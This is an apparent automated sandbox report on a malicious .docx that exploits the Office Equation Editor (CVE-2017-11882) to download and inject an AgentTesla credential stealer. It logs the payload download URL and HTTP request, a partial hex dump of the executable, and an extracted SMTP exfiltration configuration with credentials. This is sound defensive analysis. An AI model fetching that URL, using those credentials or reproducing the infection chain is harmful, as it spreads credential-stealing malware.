Play interactive tour

Edit tour

Analysis Report IMG_05412_868_21.docx

Overview

General Information

Sample Name:	IMG_05412_868_21.docx
Analysis ID:	404303
MD5:	8832e0557e1b144bad206ed6d14d5c34
SHA1:	4b729d3262362a2ab3edab09ac1f625af8f5e0c1
SHA256:	fbd1b454da7fecb92c40b9b2f74fc8fecae79340afdc011e7c0d6339fabdcfde
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Allocates memory in foreign processes

Creates an undocumented autostart registry key

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains no OLE stream with summary information

Document has an unknown application name

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2464 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2564 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

tthxx.exe (PID: 2928 cmdline: C:\Users\user\tthxx.exe MD5: CCE6C363C0FF7AC663CD71C5906069A6)

tthxx.exe (PID: 2312 cmdline: C:\Users\user\AppData\Local\Temp\tthxx.exe MD5: CCE6C363C0FF7AC663CD71C5906069A6)

EQNEDT32.EXE (PID: 3028 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

EQNEDT32.EXE (PID: 2452 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

tthxx.exe (PID: 2880 cmdline: C:\Users\user\tthxx.exe MD5: CCE6C363C0FF7AC663CD71C5906069A6)

EQNEDT32.EXE (PID: 2140 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

EQNEDT32.EXE (PID: 2196 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "bigazz@sixjan.xyzH^i?T2&gWQ({sixjan.xyz"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tthxx.exe PID: 2312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 31.210.20.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2564, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\tthxx.exe, CommandLine: C:\Users\user\tthxx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\tthxx.exe, NewProcessName: C:\Users\user\tthxx.exe, OriginalFileName: C:\Users\user\tthxx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: C:\Users\user\tthxx.exe, ProcessId: 2928

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://31.210.20.6/3/44444.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 11.2.tthxx.exe.400000.1.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "bigazz@sixjan.xyzH^i?T2&gWQ({sixjan.xyz"}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://31.210.20.6/3/44444.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\tthxx.exe	ReversingLabs: Detection: 40%

Multi AV Scanner detection for submitted file

Show sources

Source: IMG_05412_868_21.docx	Virustotal: Detection: 30%			Perma Link
Source: IMG_05412_868_21.docx	ReversingLabs: Detection: 37%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED4D2h
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED772h
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED4D2h
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED4D2h
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED772h

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 31.210.20.6:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 31.210.20.6:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.2.22:49167 -> 31.210.20.6:80
Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 31.210.20.6:80
Source: Traffic	Snort IDS: 2021245 ET TROJAN Possible Dridex Download URI Struct with no referer 192.168.2.22:49167 -> 31.210.20.6:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 20:01:56 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Mon, 03 May 2021 22:54:49 GMTETag: "53d38-5c174d9438040"Accept-Ranges: bytesContent-Length: 343352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 80 90 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 04 00 00 4a 00 00 00 00 00 00 5e f0 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f0 04 00 4b 00 00 00 00 00 05 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 38 1f 00 00 00 60 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d0 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 00 05 00 00 48 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f0 04 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 4a 00 00 24 2c 00 00 03 00 00 00 01 00 00 06 04 77 00 00 06 79 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 06 00 8c 00 00 00 00 00 00 00 1e 3a 05 00 00 00 dd 10 00 00 00 28 2f 00 00 06 38 f1 ff ff ff 26 dd 00 00 00 00 28 01 00 00 0a 14 fe 06 02 00 00 06 73 02 00 00 0a 6f 03 00 00 0a 20 b7 3e 6e 89 28 35 00 00 06 19 3a 36 00 00 00 26 20 81 3e 6e 89 28 35 00 00 06 17 8d 08 00 00 01 25 16 28 2d 00 00 06 a2 1a 3a 21 00 00 00 26 26 20 61 3e 6e 89 28 35 00 00 06 28 27 00 00 06 26 38 14 00 00 00 28 28 00 00 06 38 c1 ff ff ff 28 2a 00 00 06 38 d7 ff ff ff 2a 01 10 00 00 00 00 00 00 15 15 00 06 01 00 00 01 1b 30 04 00 dc 00 00 00 01 00 00 11 28 04 00 00 0a d0 02 00 00 02 28 05 00 00 0a 6f 06 00 00 0a 20 5e 3e 6e 89 28 35 00 00 06 28 07 00 00 0a 6f 08 00 00 0a 18 3a 06 00 00 00 26 38 06 00 00 00 0a 38 00 00 00 00 73 09 00 00 0a 1b 3a 1f 00 00 00 26 06 08 6f 0a 00 00 0a 08 6f 0b 00 00 0a 73 0c 00 00 0a 16 39 0c 00 00 00 26 38 0c 00 00 00 0c 38 dc ff ff ff 0d 38 00 00

Source: Joe Sandbox View

ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: global traffic

HTTP traffic detected: GET /3/44444.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.210.20.6Connection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABA8B27-B28F-4AE5-86AD-026C320EA73C}.tmp

Jump to behavior

Source: global traffic

Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://mNVnNH.com
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: tthxx.exe	String found in binary or memory: https://discord.com/
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	String found in binary or memory: https://discord.com/2
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000004.00000002.2242103851.0000000000C63000.00000004.00000020.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	String found in binary or memory: https://discord.com/6
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	String found in binary or memory: https://discord.com/:
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\tthxx.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe			Jump to dropped file

Source: C:\Users\user\tthxx.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\tthxx.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\tthxx.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\tthxx.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\tthxx.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E7098
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E8BEE
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E0CA5
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E1D78
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E55E0
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E5EB0
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E07C8
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001EA07C
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E2099
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E5298
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001EA330
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E6E30
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E1E2A
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001EBF00
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E9F90
Source: C:\Users\user\tthxx.exe	Code function: 4_2_005E0048
Source: C:\Users\user\tthxx.exe	Code function: 4_2_005E0014
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E7098
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E8B80
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E0CA5
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E1D78
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E55E0
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E5EB0
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E07C8
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E900F
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002EA07C
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E2099
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E5298
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002EA330
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E8BCA
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E1E2A
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E6E30
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002EBF00
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E9F90
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_00257578
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_00251F40
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_00256CA8

Source: IMG_05412_868_21.docx

OLE indicator has summary info: false

Source: IMG_05412_868_21.docx

OLE indicator application name: unknown

Source: 44444[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tthxx.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: notpad.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tthxx.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@12/11@0/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$G_05412_868_21.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCF01.tmp

Jump to behavior

Source: IMG_05412_868_21.docx

OLE document summary: title field not present or empty

Source: C:\Users\user\tthxx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\tthxx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\tthxx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: IMG_05412_868_21.docx	Virustotal: Detection: 30%
Source: IMG_05412_868_21.docx	ReversingLabs: Detection: 37%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\user\tthxx.exe	Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: C:\Users\user\tthxx.exe	Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe

Source: C:\Users\user\tthxx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\tthxx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

